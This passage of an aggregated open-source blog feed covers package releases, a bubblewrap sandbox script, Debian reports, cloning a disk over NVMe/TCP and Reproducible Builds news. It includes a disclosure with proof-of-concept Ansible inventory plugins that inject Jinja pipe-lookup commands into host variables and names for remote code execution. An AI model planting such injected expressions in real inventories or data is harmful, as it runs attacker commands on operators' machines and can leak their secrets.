From the Mobian Devices list [16] the OnePlus 6T has 8G of RAM or more but isn't available in Australia and costs more than $400 when imported. The PocoPhone F1 doesn't seem to be available on ebay. The Shift6mq is made by a German company with similar aims to the Fairphone [17]; it looks nice but costs €577, which is more than I want to spend, and it isn't on the officially supported list.

Smart Watches

The same issues apply to smart watches. AsteroidOS is a free smart watch OS designed for closed hardware [18]. I don't have time to get involved in this sort of thing though, I can't hack on every device I use.

Categories: FLOSS Project Planets

Dirk Eddelbuettel: digest 0.6.35 on CRAN: New xxhash code

Mon, 2024-03-11 19:23

Release 0.6.35 of the digest package arrived at CRAN today and has also been uploaded to Debian already.

digest creates hash digests of arbitrary R objects. It can use a number of different hashing algorithms (md5, sha-1, sha-256, sha-512, crc32, xxhash32, xxhash64, murmur32, spookyhash, blake3, crc32c – and now also xxh3_64 and xxh3_128), and enables easy comparison of (potentially large and nested) R language objects as it relies on the native serialization in R. It is a mature and widely-used package (with 65.8 million downloads just on the partial cloud mirrors of CRAN which keep logs) as many tasks may involve caching of objects for which it provides convenient general-purpose hash key generation to quickly identify the various objects.

This release updates the included xxHash version to the current version 0.8.2, updating the existing xxhash32 and xxhash64 hash functions — and also adding the newer xxh3_64 and xxh3_128 ones. We have a project at work using xxh3_128 from Python which made me realize having it from R would be nice too, and given the existing infrastructure in the package actually doing so was fairly quick and straightforward.
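
On the Python side, the xxh3 algorithms come from the third-party xxhash package (a sketch; the xxh3_64/xxh3_128 helpers assume xxhash >= 2.0), which makes cross-language comparison of digests straightforward:

# Sketch: computing xxh3 digests from Python with the third-party
# xxhash package, e.g. to compare against digests computed in R.
# Note that R's digest serializes R objects by default, so for a
# byte-for-byte comparison hash the same raw bytes on both sides.
import xxhash

data = b"hello, world"
print(xxhash.xxh3_64_hexdigest(data))
print(xxhash.xxh3_128_hexdigest(data))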

My CRANberries provides a summary of changes to the previous version. For questions or comments use the issue tracker off the GitHub repo. For documentation (including the changelog) see the documentation site.

If you like this or other open-source work I do, you can now sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Categories: FLOSS Project Planets

Joachim Breitner: Convenient sandboxed development environment

Mon, 2024-03-11 16:39

I like using one machine and setup for everything, from serious development work to hobby projects to managing my finances. This is very convenient, as often the lines between these are blurred. But it is also scary if I think of the large number of people who I have to trust to not want to extract all my personal data. Whenever I run a cabal install, or a fun VSCode extension gets updated, or anything like that, I am running code that could be malicious or buggy.

In a way it is surprising and reassuring that, as far as I can tell, this commonly does not happen. Most open source developers out there seem to be nice and well-meaning, after all.

Convenient or it won’t happen

Nevertheless I thought I should do something about this. The safest option would probably be to use dedicated virtual machines for the development work, with very little interaction with my main system. But knowing me, that did not seem likely to happen, as it sounded like a fair amount of hassle. So I aimed for a viable compromise between security and convenience, and one that does not get too much in the way of my current habits.

For instance, it seems desirable to have the project files accessible from my unconstrained environment. This way, I could perform certain actions that need access to secret keys or tokens, but are unlikely to run code (e.g. git push, git pull from private repositories, gh pr create), from “the outside”, and the actual build environment can do without access to these secrets.

The user experience I thus want is a quick way to enter a “development environment” where I can do most of the things I need to do while programming (network access, running command line and GUI programs), with access to the current project, but without access to my actual /home directory.

I initially followed the blog post “Application Isolation using NixOS Containers” by Marcin Sucharski and got something working that mostly did what I wanted, but then a colleague pointed out that tools like firejail can achieve roughly the same with a less “global” setup. I tried to use firejail, but found it to be a bit too inflexible for my particular whims, so I ended up writing a small wrapper around the lower level sandboxing tool https://github.com/containers/bubblewrap.

Selective bubblewrapping

This script, called dev and included below, builds a new filesystem namespace with minimal /proc and /dev directories and its own /tmp directory. It then bind-mounts some directories to make the host's NixOS system available inside the container (/bin, /usr, the nix store including its domain socket, stuff for OpenGL applications). My user's home directory is taken from ~/.dev-home and some configuration files are bind-mounted for convenient sharing. I intentionally don't share most of the configuration – for example, a direnv enable in the dev environment should not affect the main environment. The X11 socket for graphical applications and the corresponding .Xauthority file is made available. And finally, if I run dev in a project directory, this project directory is bind mounted writable, and the current working directory is preserved.

The effect is that I can type dev on the command line to enter “dev mode” rather conveniently. I can run development tools, including graphical ones like VSCode, and especially the latter with its extensions is part of the sandbox. To do a git push I either exit the development environment (Ctrl-D) or open a separate terminal. Overall, the inconvenience of switching back and forth seems worth the extra protection.

Clearly, this isn’t going to hold against a determined and maybe targeted attacker (e.g. access to the X11 and the nix daemon socket can probably be used to escape easily). But I hope it will help against a compromised dev dependency that just deletes or exfiltrates data, like keys or passwords, from the usual places in $HOME.

Rough corners

There is more polishing that could be done.

  • In particular, clicking on a link inside VSCode in the container will currently open Firefox inside the container, without access to my settings and cookies etc. Ideally, links would be opened in the Firefox running outside. This is a problem that has a solution in the world of applications that are sandboxed with Flatpak, and involves a bunch of moving parts (a xdg-desktop-portal user service, a filtering dbus proxy, exposing access to that proxy in the container). I experimented with that for a bit longer than I should have, but could not get it to work to satisfaction (even without a container involved, I could not get xdg-desktop-portal to heed my default browser settings…). For now I will live with manually copying and pasting URLs, we’ll see how long this lasts.

  • With this setup (and unlike the NixOS container setup I tried first), the same applications are installed inside and outside. It might be useful to separate the set of installed programs: there is simply no point in running evolution or firefox inside the container, and if I do not even have VSCode or cabal available outside, it's less likely that I forget to enter dev before using these tools.

    It shouldn’t be too hard to cargo-cult some of the NixOS Containers infrastructure to be able to have a separate system configuration that I can manage as part of my normal system configuration and make available to bubblewrap here.

So likely I will refine this some more over time. Or get tired of typing dev and going back to what I did before…

The script

The dev script (at the time of writing):

#!/usr/bin/env bash

extra=()
if [[ "$PWD" == /home/jojo/build/* ]] || [[ "$PWD" == /home/jojo/projekte/programming/* ]]
then
  extra+=(--bind "$PWD" "$PWD" --chdir "$PWD")
fi

if [ -n "$1" ]
then
  cmd=( "$@" )
else
  cmd=( bash )
fi

# Caveats:
# * access to all of `/etc`
# * access to `/nix/var/nix/daemon-socket/socket`, and is trusted user (but needed to run nix)
# * access to X11

exec bwrap \
  --unshare-all \
  \
  `# blank slate` \
  --share-net \
  --proc /proc \
  --dev /dev \
  --tmpfs /tmp \
  --tmpfs /run/user/1000 \
  \
  `# Needed for GLX applications, in particular alacritty` \
  --dev-bind /dev/dri /dev/dri \
  --ro-bind /sys/dev/char /sys/dev/char \
  --ro-bind /sys/devices/pci0000:00 /sys/devices/pci0000:00 \
  --ro-bind /run/opengl-driver /run/opengl-driver \
  \
  --ro-bind /bin /bin \
  --ro-bind /usr /usr \
  --ro-bind /run/current-system /run/current-system \
  --ro-bind /nix /nix \
  --ro-bind /etc /etc \
  --ro-bind /run/systemd/resolve/stub-resolv.conf /run/systemd/resolve/stub-resolv.conf \
  \
  --bind ~/.dev-home /home/jojo \
  --ro-bind ~/.config/alacritty ~/.config/alacritty \
  --ro-bind ~/.config/nvim ~/.config/nvim \
  --ro-bind ~/.local/share/nvim ~/.local/share/nvim \
  --ro-bind ~/.bin ~/.bin \
  \
  --bind /tmp/.X11-unix/X0 /tmp/.X11-unix/X0 \
  --bind ~/.Xauthority ~/.Xauthority \
  --setenv DISPLAY :0 \
  \
  --setenv container dev \
  "${extra[@]}" \
  -- \
  "${cmd[@]}"
Categories: FLOSS Project Planets

Evgeni Golov: Remote Code Execution in Ansible dynamic inventory plugins

Mon, 2024-03-11 16:00

I had reported this to Ansible a year ago (2023-02-23), but it seems this is considered expected behavior, so I am posting it here now.

TL;DR

Don't ever consume any data you got from an inventory if there is a chance somebody untrusted touched it.

Inventory plugins

Inventory plugins allow Ansible to pull inventory data from a variety of sources. The most common ones are probably the ones fetching instances from clouds like Amazon EC2 and Hetzner Cloud or the ones talking to tools like Foreman.

For Ansible to function, an inventory needs to tell Ansible how to connect to a host (so e.g. a network address) and which groups the host belongs to (if any). But it can also set any arbitrary variable for that host, which is often used to provide additional information about it. These can be tags in EC2, parameters in Foreman, and other arbitrary data someone thought would be good to attach to that object.

And this is where things are getting interesting. Somebody could add a comment to a host and that comment would be visible to you when you use the inventory with that host. And if that comment contains a Jinja expression, it might get executed. And if that Jinja expression is using the pipe lookup, it might get executed in your shell.

Let that sink in for a moment, and then we'll look at an example.

Example inventory plugin

from ansible.plugins.inventory import BaseInventoryPlugin

class InventoryModule(BaseInventoryPlugin):
    NAME = 'evgeni.inventoryrce.inventory'

    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid

    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('exploit.example.com')
        self.inventory.set_variable('exploit.example.com', 'ansible_connection', 'local')
        self.inventory.set_variable('exploit.example.com', 'something_funny', '{{ lookup("pipe", "touch /tmp/hacked" ) }}')

The code is mostly copy & paste from the Developing dynamic inventory docs for Ansible and does three things:

  1. defines the plugin name as evgeni.inventoryrce.inventory
  2. accepts any config that ends with evgeni.yml (we'll need that to trigger the use of this inventory later)
  3. adds an imaginary host exploit.example.com with local connection type and something_funny variable to the inventory

In reality this would be talking to some API, iterating over hosts known to it, fetching their data, etc. But the structure of the code would be very similar.

The crucial part is that if we have a string with a Jinja expression, we can set it as a variable for a host.

Using the example inventory plugin

Now we install the collection containing this inventory plugin, or rather write the code to ~/.ansible/collections/ansible_collections/evgeni/inventoryrce/plugins/inventory/inventory.py (or wherever your Ansible loads its collections from).

And we create a configuration file. As there is nothing to configure, it can be empty and only needs to have the right filename: touch inventory.evgeni.yml is all you need.

If we now call ansible-inventory, we'll see our host and our variable present:

% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-inventory -i inventory.evgeni.yml --list
{
    "_meta": {
        "hostvars": {
            "exploit.example.com": {
                "ansible_connection": "local",
                "something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"
            }
        }
    },
    "all": {
        "children": [
            "ungrouped"
        ]
    },
    "ungrouped": {
        "hosts": [
            "exploit.example.com"
        ]
    }
}

(ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory is required to allow the use of our inventory plugin, as it's not in the default list.)

So far, nothing dangerous has happened. The inventory got generated, the host is present, the funny variable is set, but it's still only a string.

Executing a playbook, interpreting Jinja

To execute the code we'd need to use the variable in a context where Jinja is used. This could be a template where you actually use this variable, like a report where you print the comment the creator has added to a VM.

Or a debug task where you dump all variables of a host to analyze what's set. Let's use that!

- hosts: all
  tasks:
    - name: Display all variables/facts known for a host
      ansible.builtin.debug:
        var: hostvars[inventory_hostname]

This playbook looks totally innocent: run against all hosts and dump their hostvars using debug. No mention of our funny variable. Yet, when we execute it, we see:

% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml

PLAY [all] ************************************************************************************************

TASK [Gathering Facts] ************************************************************************************
ok: [exploit.example.com]

TASK [Display all variables/facts known for a host] *******************************************************
ok: [exploit.example.com] => {
    "hostvars[inventory_hostname]": {
        "ansible_all_ipv4_addresses": [
            "192.168.122.1"
        ],
        …
        "something_funny": ""
    }
}

PLAY RECAP *************************************************************************************************
exploit.example.com : ok=2 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0

We got all variables dumped, that was expected, but now something_funny is an empty string? Jinja got executed, and the expression was {{ lookup("pipe", "touch /tmp/hacked" ) }} and touch does not return anything. But it did create the file!

% ls -alh /tmp/hacked
-rw-r--r--. 1 evgeni evgeni 0 Mar 10 17:18 /tmp/hacked

We just "hacked" the Ansible control node (aka: your laptop), as that's where lookup is executed. It could also have used the url lookup to send the contents of your Ansible vault to some internet host. Or connect to some VPN-secured system that should not be reachable from EC2/Hetzner/….

Why is this possible?

This happens because set_variable(entity, varname, value) doesn't mark the values as unsafe and Ansible processes everything with Jinja in it.

In this very specific example, a possible fix would be to explicitly wrap the string in AnsibleUnsafeText by using wrap_var:

from ansible.utils.unsafe_proxy import wrap_var
…
self.inventory.set_variable('exploit.example.com', 'something_funny', wrap_var('{{ lookup("pipe", "touch /tmp/hacked" ) }}'))

Which then gets rendered as a string when dumping the variables using debug:

"something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"

But it seems inventories don't do this:

for k, v in host_vars.items():
    self.inventory.set_variable(name, k, v)

(aws_ec2.py)

for key, value in hostvars.items():
    self.inventory.set_variable(hostname, key, value)

(hcloud.py)

for k, v in hostvars.items():
    try:
        self.inventory.set_variable(host_name, k, v)
    except ValueError as e:
        self.display.warning("Could not set host info hostvar for %s, skipping %s: %s" % (host, k, to_text(e)))

(foreman.py)

And honestly, I can totally understand that. When developing an inventory, you do not expect to handle insecure input data. You also expect the API to handle the data in a secure way by default. But set_variable doesn't allow you to tag data as "safe" or "unsafe" easily and data in Ansible defaults to "safe".
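
A defensive pattern for inventory authors is therefore to wrap everything by default before it goes into set_variable. A hypothetical helper (set_host_vars_safely is my own name, not an Ansible API; wrap_var itself is real and recurses into dicts and lists):

# Hypothetical defensive helper for inventory plugins: wrap every value
# before handing it to set_variable, so Jinja treats it as literal text
# instead of a template. wrap_var recurses into dicts and lists, so
# nested data is covered too.
from ansible.utils.unsafe_proxy import wrap_var

def set_host_vars_safely(inventory, host_name, host_vars):
    for key, value in host_vars.items():
        inventory.set_variable(host_name, key, wrap_var(value))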

Can something similar happen in other parts of Ansible?

It has certainly happened in the past that Jinja was abused in Ansible: CVE-2016-9587, CVE-2017-7466 and CVE-2017-7481.

But even if we only look at inventories, add_host(host) can be abused in a similar way:

from ansible.plugins.inventory import BaseInventoryPlugin

class InventoryModule(BaseInventoryPlugin):
    NAME = 'evgeni.inventoryrce.inventory'

    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid

    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}')

% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml

PLAY [all] ************************************************************************************************

TASK [Gathering Facts] ************************************************************************************
fatal: [lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}]: UNREACHABLE! => {"changed": false, "msg": "Failed to connect to the host via ssh: ssh: Could not resolve hostname lol: No address associated with hostname", "unreachable": true}

PLAY RECAP ************************************************************************************************
lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }} : ok=0 changed=0 unreachable=1 failed=0 skipped=0 rescued=0 ignored=0

% ls -alh /tmp/hacked-host
-rw-r--r--. 1 evgeni evgeni 0 Mar 13 08:44 /tmp/hacked-host

Affected versions

I've tried this on Ansible (core) 2.13.13 and 2.16.4. I'd totally expect older versions to be affected too, but I have not verified that.

Categories: FLOSS Project Planets

Thorsten Alteholz: My Debian Activities in February 2024

Sun, 2024-03-10 08:22
FTP master

This month I accepted 242 and rejected 42 packages. The overall number of packages that got accepted was 251.

This was just a short month and the weather outside was not really motivating. I hope it will be better in March.

Debian LTS

This was my one-hundred-and-sixteenth month that I did some work for the Debian LTS initiative, started by Raphael Hertzog at Freexian.

During my allocated time I uploaded:

  • [DLA 3739-1] libjwt security update for one CVE to fix a ‘constant time for execution’ issue
  • [libjwt] upload to unstable
  • [#1064550] Bullseye PU bug for libjwt
  • [#1064551] Bookworm PU bug for libjwt
  • [#1064551] Bookworm PU bug for libjwt; upload after approval
  • [DLA 3741-1] engrampa security update for one CVE to fix a path traversal issue with CPIO archives
  • [#1060186] Bookworm PU-bug for libde265 was flagged for acceptance
  • [#1056935] Bullseye PU-bug for libde265 was flagged for acceptance

I also started to work on qtbase-opensource-src (an update is needed for ELTS, so an LTS update seems to be appropriate as well, especially as there are postponed CVEs).

Debian ELTS

This month was the sixty-seventh ELTS month. During my allocated time I uploaded:

  • [ELA-1047-1] bind9 security update for one CVE to fix a stack exhaustion issue in Jessie and Stretch

The upload of bind9 was a bit exciting, but all issues that occurred with the new upload workflow could be quickly fixed by Helmut, and the packages finally reached their destination. I wonder why it is always me who stumbles upon special cases? This month I also worked on the Jessie and Stretch updates for exim4. I also started to work on an update for qtbase-opensource-src in Stretch (and LTS and other releases as well).

Debian Printing

This month I uploaded new upstream versions of:

This work is generously funded by Freexian!

Debian Matomo

I started a new team, debian-matomo-maintainers, in which all Matomo-related packages should be handled. PHP PEAR and PECL packages will still be maintained in their corresponding teams.

This month I uploaded:

This work is generously funded by Freexian!

Debian Astro

This month I uploaded a new upstream version of:

Debian IoT

This month I uploaded new upstream versions of:

Categories: FLOSS Project Planets

Vasudev Kamath: Cloning a laptop over NVME TCP

Sun, 2024-03-10 07:45

Recently, I got a new laptop and had to set it up so I could start using it. But I wasn't really in the mood to go through the same old steps which I had explained in this post earlier. I was complaining about this to my colleague, who suggested: why not just copy the entire disk over to the new laptop? Though it sounded like an interesting idea to me, I had my doubts, so here is what I told him in return.

  1. I don't have the tools to open my old laptop and connect the new disk over USB to my new laptop.
  2. I use full disk encryption, and my old laptop has a 512GB disk, whereas the new laptop has a 1TB NVME, and I'm not so familiar with resizing LUKS.

He promptly suggested both could be done. For step 1, just expose the disk using NVME over TCP and connect it over the network and do a full disk copy, and the rest is pretty simple to achieve. In short, he suggested the following:

  1. Export the disk using nvmet-tcp from the old laptop.
  2. Do a disk copy to the new laptop.
  3. Resize the partition to use the full 1TB.
  4. Resize LUKS.
  5. Finally, resize the BTRFS root disk.
Exporting Disk over NVME TCP

The easiest way suggested by my colleague to do this is using systemd-storagetm.service. This service can be invoked by simply booting into storage-target-mode.target, by specifying rd.systemd.unit=storage-target-mode.target on the kernel command line. But he suggested not to use this, as I would need to tweak the dracut initrd image to bring up network services, and configuring WiFi from this mode is a painful thing to do.

So alternatively, I simply booted both my laptops with the GRML rescue CD, and the following steps were used to export the NVME disk of my current laptop using the nvmet-tcp module of Linux:

modprobe nvmet-tcp
cd /sys/kernel/config/nvmet
mkdir ports/0
cd ports/0
echo "ipv4" > addr_adrfam
echo 0.0.0.0 > addr_traddr
echo 4420 > addr_trsvcid
echo tcp > addr_trtype
cd /sys/kernel/config/nvmet/subsystems
mkdir testnqn
echo 1 > testnqn/allow_any_host
mkdir testnqn/namespaces/1
cd testnqn
# replace the device name with the disk you want to export
echo "/dev/nvme0n1" > namespaces/1/device_path
echo 1 > namespaces/1/enable
ln -s "../../subsystems/testnqn" /sys/kernel/config/nvmet/ports/0/subsystems/testnqn

These steps ensure that the device is now exported using NVME over TCP. The next step is to detect this on the new laptop and connect the device:

nvme discover -t tcp -a <ip> -s 4420
nvme connect-all -t tcp -a <ip> -s 4420

Finally, nvme list shows the device which is connected to the new laptop, and we can proceed with the next step, which is to do the disk copy.

Copying the Disk

I simply used the dd command to copy the root disk to my new laptop. Since the new laptop didn't have an Ethernet port, I had to rely only on WiFi, and it took about 7 and a half hours to copy the entire 512GB to the new laptop. The speed at which I was copying was about 18-20MB/s. The other option would have been to create an initial partition and file system and do an rsync of the root disk or use BTRFS itself for file system transfer.

dd if=/dev/nvme2n1 of=/dev/nvme0n1 status=progress bs=40M

Resizing Partition and LUKS Container

The final part was very easy. When I launched parted, it detected that the partition table did not match the disk size and asked if it could fix it, and I said yes. Next, I had to install cloud-guest-utils to get growpart to fix the second partition, and the following command extended the partition to the full 1TB:

growpart /dev/nvme0n1 2

Next, I used cryptsetup resize to increase the LUKS container size.

cryptsetup luksOpen /dev/nvme0n1p2 ENC
cryptsetup resize ENC

Finally, I rebooted into the disk, and everything worked fine. After logging into the system, I resized the BTRFS file system. BTRFS requires the system to be mounted for resize, so I could not attempt it in live boot.

btrfs filesystem resize max /

Conclusion

The only benefit of this entire process is that I have a new laptop, but I still feel like I'm using my existing laptop. Typically, setting up a new laptop takes about a week or two to completely get adjusted, but in this case, that entire time is saved.

An added benefit is that I learned how to export disks using NVME over TCP, thanks to my colleague. This new knowledge adds to the value of the experience.

Categories: FLOSS Project Planets

Valhalla's Things: Low Fat, No Eggs, Lasagna-ish

Sat, 2024-03-09 19:00
Posted on March 10, 2024
Tags: madeof:atoms, craft:cooking

A few notes on what we had for lunch, to be able to repeat it after the summer.

There were a number of food intolerance related restrictions which meant that the traditional lasagna recipe wasn’t an option; the result still tasted good, but it was a bit softer and messier to take out of the pan and into the dishes.

On Saturday afternoon we made fresh no-egg pasta with 200 g (durum) flour and 100 g water, after about 1 hour it was divided in 6 parts and rolled to thickness #6 on the pasta machine.

Meanwhile, about 500 ml of low fat almost-ragù-like meat sauce was taken out of the freezer: this was a bit too little, 750 ml would have been better.

On Saturday evening we made a sauce with 1 l of low-fat milk and 80 g of flour, and the meat sauce was heated up.

Then everything was put in a 28 cm × 23 cm pan, with 6 layers of pasta and 7 layers of the two sauces, and left to cool down.

And on Sunday morning it was baked for 35 min in the oven at 180 °C.

With 3 people we only had about two thirds of it.

Next time I think we should try to use 400 - 500 g of flour (so that it’s easier to work by machine), 2 l of milk, 1.5 l of meat sauce and divide it into 3 pans: one to eat the next day and two to freeze (uncooked) for another day.

No pictures, because by the time I thought about writing a post we were already more than halfway through eating it :)

Categories: FLOSS Project Planets

Reproducible Builds: Reproducible Builds in February 2024

Sat, 2024-03-09 11:53

Welcome to the February 2024 report from the Reproducible Builds project! In our reports, we try to outline what we have been up to over the past month as well as mentioning some of the important things happening in software supply-chain security.

Reproducible Builds at FOSDEM 2024

Core Reproducible Builds developer Holger Levsen presented at the main track at FOSDEM on Saturday 3rd February this year in Brussels, Belgium. However, that wasn’t the only talk related to Reproducible Builds.

Please see our comprehensive FOSDEM 2024 news post for the full details and links.


Maintainer Perspectives on Open Source Software Security

Bernhard M. Wiedemann spotted that a recent report entitled Maintainer Perspectives on Open Source Software Security written by Stephen Hendrick and Ashwin Ramaswami of the Linux Foundation sports an infographic which mentions that “56% of [polled] projects support reproducible builds”.


Three new reproducibility-related academic papers

A total of three separate scholarly papers related to Reproducible Builds have appeared this month:

Signing in Four Public Software Package Registries: Quantity, Quality, and Influencing Factors by Taylor R. Schorlemmer, Kelechi G. Kalu, Luke Chigges, Kyung Myung Ko, Eman Abdul-Muhd, Abu Ishgair, Saurabh Bagchi, Santiago Torres-Arias and James C. Davis (Purdue University, Indiana, USA) is concerned with the problem that:

Package maintainers can guarantee package authorship through software signing [but] it is unclear how common this practice is, and whether the resulting signatures are created properly. Prior work has provided raw data on signing practices, but measured single platforms, did not consider time, and did not provide insight on factors that may influence signing. We lack a comprehensive, multi-platform understanding of signing adoption and relevant factors. This study addresses this gap. (arXiv, full PDF)


Reproducibility of Build Environments through Space and Time by Julien Malka, Stefano Zacchiroli and Théo Zimmermann (Institut Polytechnique de Paris, France) addresses:

[The] principle of reusability […] makes it harder to reproduce projects’ build environments, even though reproducibility of build environments is essential for collaboration, maintenance and component lifetime. In this work, we argue that functional package managers provide the tooling to make build environments reproducible in space and time, and we produce a preliminary evaluation to justify this claim.

The abstract continues with the claim that “Using historical data, we show that we are able to reproduce build environments of about 7 million Nix packages, and to rebuild 99.94% of the 14 thousand packages from a 6-year-old Nixpkgs revision.” (arXiv, full PDF)


Options Matter: Documenting and Fixing Non-Reproducible Builds in Highly-Configurable Systems by Georges Aaron Randrianaina, Djamel Eddine Khelladi, Olivier Zendra and Mathieu Acher (Inria centre at Rennes University, France):

This paper thus proposes an approach to automatically identify configuration options causing non-reproducibility of builds. It begins by building a set of builds in order to detect non-reproducible ones through binary comparison. We then develop automated techniques that combine statistical learning with symbolic reasoning to analyze over 20,000 configuration options. Our methods are designed to both detect options causing non-reproducibility, and remedy non-reproducible configurations, two tasks that are challenging and costly to perform manually. (HAL Portal, full PDF)


Mailing list highlights

From our mailing list this month:


Distribution work

In Debian this month, 5 reviews of Debian packages were added, 22 were updated and 8 were removed this month adding to Debian’s knowledge about identified issues. A number of issue types were updated as well. […][…][…][…] In addition, Roland Clobus posted his 23rd update of the status of reproducible ISO images on our mailing list. In particular, Roland helpfully summarised that “all major desktops build reproducibly with bullseye, bookworm, trixie and sid provided they are built for a second time within the same DAK run (i.e. [within] 6 hours)” and that there will likely be further work at a MiniDebCamp in Hamburg. Furthermore, Roland also responded in-depth to a query about a previous report.


Fedora developer Zbigniew Jędrzejewski-Szmek announced a work-in-progress script called fedora-repro-build that attempts to reproduce an existing package within a koji build environment. Although the project’s README file notes that a number of fields “will always or almost always vary” and there is a non-zero list of other known issues, this is an excellent first step towards full Fedora reproducibility.


Jelle van der Waa introduced a new linter rule for Arch Linux packages in order to detect cache files leftover by the Sphinx documentation generator which are unreproducible by nature and should not be packaged. At the time of writing, 7 packages in the Arch repository are affected by this.


Elsewhere, Bernhard M. Wiedemann posted another monthly update for his work elsewhere in openSUSE.


diffoscope

diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This month, Chris Lamb made a number of changes such as uploading versions 256, 257 and 258 to Debian and made the following additional changes:

  • Use a deterministic name instead of trusting gpg’s --use-embedded-filenames. Many thanks to Daniel Kahn Gillmor <dkg@debian.org> for reporting this issue and providing feedback. [][]
  • Don’t error-out with a traceback if we encounter struct.unpack-related errors when parsing Python .pyc files. (#1064973). []
  • Don’t try and compare rdb_expected_diff on non-GNU systems as %p formatting can vary, especially with respect to MacOS. []
  • Fix compatibility with pytest 8.0. []
  • Temporarily fix support for Python 3.11.8. []
  • Use the 7zip package (over p7zip-full) after a Debian package transition. (#1063559). []
  • Bump the minimum Black source code reformatter requirement to 24.1.1+. []
  • Expand an older changelog entry with a CVE reference. []
  • Make test_zip black clean. []

In addition, James Addison contributed a patch to correctly parse the headers from diff(1) [][] — thanks! And lastly, Vagrant Cascadian pushed updates in GNU Guix for diffoscope to versions 255, 256, and 258, and updated trydiffoscope to 67.0.6.


reprotest

reprotest is our tool for building the same source code twice in different environments and then checking the binaries produced by each build for any differences. This month, Vagrant Cascadian made a number of changes, including:

  • Create a (working) proof of concept for enabling a specific number of CPUs. [][]
  • Consistently use 398 days for time variation rather than choosing randomly and update README.rst to match. [][]
  • Support a new --vary=build_path.path option. [][][][]


Website updates

A number of improvements were made to our website this month, including:


Reproducibility testing framework

The Reproducible Builds project operates a comprehensive testing framework (available at tests.reproducible-builds.org) in order to check packages and other artifacts for reproducibility. In February, a number of changes were made by Holger Levsen:

  • Debian-related changes:

    • Temporarily disable upgrading/bootstrapping Debian unstable and experimental as they are currently broken. [][]
    • Use the 64-bit amd64 kernel on all i386 nodes; no more 686 PAE kernels. []
    • Add an Erlang package set. []
  • Other changes:

    • Grant Jan-Benedict Glaw shell access to the Jenkins node. []
    • Enable debugging for NetBSD reproducibility testing. []
    • Use /usr/bin/du --apparent-size in the Jenkins shell monitor. []
    • Revert “reproducible nodes: mark osuosl2 as down”. []
    • Thanks again to Codethink, for they have doubled the RAM on our arm64 nodes. []
    • Only set /proc/$pid/oom_score_adj to -1000 if it has not already been done. []
    • Add the openwrt-target-tegra and jtx tasks to the list of zombie jobs. [][]

Vagrant Cascadian also made the following changes:

  • Overhaul the handling of OpenSSH configuration files after updating from Debian bookworm. [][][]
  • Add two new armhf architecture build nodes, virt32z and virt64z, and insert them into the Munin monitoring. [][] [][]

In addition, Alexander Couzens updated the OpenWrt configuration in order to replace the tegra target with mpc85xx [], Jan-Benedict Glaw updated the NetBSD build script to use a separate $TMPDIR to mitigate out of space issues on a tmpfs-backed /tmp [] and Zheng Junjie added a link to the GNU Guix tests [].

Lastly, node maintenance was performed by Holger Levsen [][][][][][] and Vagrant Cascadian [][][][].


Upstream patches

The Reproducible Builds project detects, dissects and attempts to fix as many currently-unreproducible packages as possible. We endeavour to send all of our patches upstream where appropriate. This month, we wrote a large number of such patches, including:


If you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. However, you can get in touch with us via:

Categories: FLOSS Project Planets

Iustin Pop: Finally learning some Rust - hello photo-backlog-exporter!

Sat, 2024-03-09 08:30

After 4? 5? or so years of wanting to learn Rust, over the past 4 or so months I finally bit the bullet and found the motivation to write some Rust. And the subject.

And I was, and still am, thoroughly surprised. It’s like someone took Haskell, simplified it to some extent, and wrote a systems language out of it. Writing Rust after Haskell seems easy, and pleasant, and you:

  • don’t have to care about unintended laziness which causes memory “leaks” (stuck memory, more like).
  • don’t have to care about GC eating too much of your multi-threaded RTS.
  • can be happy that there’s lots of activity and buzz around the language.
  • can be happy for generating very small, efficient binaries that feel right at home on Raspberry Pi, especially not the 5.
  • are very happy that error handling is done right (Option and Result, not like Go…)

On the other hand:

  • there are no actual monads; the ? operator kind-of-looks-like being in do blocks, but only and only for Option and Result, sadly.
  • there’s no Stackage, it’s like having only Hackage available, and you can hope all packages work together well.
  • most packaging is designed to work only against upstream/online crates.io, so offline packaging is doable but not “native” (from what I’ve seen).

However, overall, one can clearly see there’s more movement in Rust, and the quality of some parts of the toolchain is better (looking at you, rust-analyzer, compared to HLS).

So, with that, I’ve just tagged photo-backlog-exporter v0.1.0. It’s a port of a Python script that was run as a textfile collector, which meant updates every ~15 minutes, since it was a bit slow to start, which I then rewrote in Go (but I don’t like Go the language, plus the GC - if I have to deal with a GC, I’d rather write Haskell), then finally rewrote in Rust.

What does this do? It exports metrics for Prometheus based on the count, age and distribution of files in a directory. These files being, for me, the pictures I still have to sort, cull and process, because I never have enough free time to clear out the backlog. The script is kind of designed to work together with Corydalis, but since it doesn’t care about file content, it can also double (easily) as simple “file count/age exporter”.
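To make the “textfile collector” idea concrete, here is a rough Python sketch of that kind of script (the metric names and output format details are my guesses, not the real ones from photo-backlog-exporter): it walks a directory, counts the files, and prints node_exporter-compatible metrics to stdout.

#!/usr/bin/python3
"""Minimal sketch of a Prometheus textfile-collector script:
count files under a directory and report the oldest file's age."""
import os
import sys
import time


def main(directory):
    now = time.time()
    ages = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            try:
                ages.append(now - os.path.getmtime(os.path.join(root, name)))
            except OSError:
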